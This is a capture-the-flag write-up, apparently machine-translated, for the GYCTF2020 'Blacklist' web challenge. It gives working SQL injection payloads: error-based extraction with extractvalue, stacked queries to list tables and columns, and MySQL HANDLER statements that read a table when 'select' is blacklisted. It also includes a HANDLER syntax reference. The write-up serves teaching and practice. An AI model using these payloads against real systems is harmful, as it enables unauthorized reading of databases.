[GYCTF2020]Blacklist

[GYCTF2020]Blacklist

The title directly tells you that you need to bypass the blacklist , Look at this input field , It feels like an order is being executed .

After testing , Make sure that the command is not executed , It's a sql Inject , See the error message , Then use An error injection Try it .

The current database name is obtained through error injection , Then try to explode the table name .

# payload
?inject=0'-extractvalue(1,(concat('~',database())))+%23

The blasting table name is filtered , I was waiting , The filtered keywords are displayed .

select Keywords are filtered , But found no filtering ; You can try Stack Injection , Try it .

# payload
?inject=0';show+database();show+tables;%23

Successfully stacked and injected , Query the database and the tables in the current database ,flag It should be in FlagHere In the table .

# payload
?inject=0';show+columns+from+FlagHere;%23

however select How can I view data after being filtered , Or Du Niang awesome , You can find anything you want .

# HANDLER  sentence 
HANDLER tbl_name OPEN [ [AS] alias]
[
	HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]
	HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
	HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]
]
HANDLER table_name OPEN： Open a table handle .
HANDLER table_name READ index： Access the index of the table .
HANDLER table_name CLOSE： Close the open handle .

# 1、 Query through the specified index 
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
    [ WHERE where_condition ] [LIMIT ... ]

# 2、 View the table through the index of 
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
    [ WHERE where_condition ] [LIMIT ... ]
# FIRST： Get the first line （ The row with the smallest index ）
# NEXT： Get the next line 
# PREV： Get previous row 
# LAST： Get the last line （ The row with the largest index ）

# 2、 View table without index 
HANDLER tbl_name READ { FIRST | NEXT }
    [ WHERE where_condition ] [LIMIT ... ]
		
# READ FIRST:  Get the first line of the handle 
# READ NEXT:  Get other rows in turn 

#  Execute after the last line  READ NEXT  Will return an empty result 


##  Complete example 
###  View the table through the specified index 
mysql> HANDLER test_table OPEN;HANDLER test_table READ test_index=(4);HANDLER test_table CLOSE;
Query OK, 0 rows affected (0.00 sec)

+------+------+
| id   | name |
+------+------+
|    4 |      |
+------+------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec)

###  View table by index 
mysql> HANDLER test_table OPEN;HANDLER test_table READ FIRST;HANDLER test_table CLOSE;
Query OK, 0 rows affected (0.00 sec)

+------+------+
| id   | name |
+------+------+
|    3 |      |
+------+------+
1 row in set (0.00 sec)

Query OK, 0 rows affected (0.00 sec

###  View the table by getting the next row of the index in turn 

mysql> HANDLER test_table OPEN;HANDLER test_table READ NEXT;
Query OK, 0 rows affected (0.00 sec)

+------+------+
| id   | name |
+------+------+
|    3 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
+------+------+
| id   | name |
+------+------+
|    4 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
+------+------+
| id   | name |
+------+------+
|    5 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
+------+------+
| id   | name |
+------+------+
|    1 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
+------+------+
| id   | name |
+------+------+
|    2 |      |
+------+------+
1 row in set (0.00 sec)

mysql> HANDLER test_table READ NEXT;
Empty set (0.00 sec)
													 
####  Finally, the end of the index returns null 

Use HANDLER Statement found flag.

# payload
?inject=0';HANDLER+FlagHere+OPEN;HANDLER+FlagHere+READ+NEXT;HANDLER+FlagHere+CLOSE;%23

Reference article ：

MySQL And handler Detailed use and description of

[MYSQL How to use handler](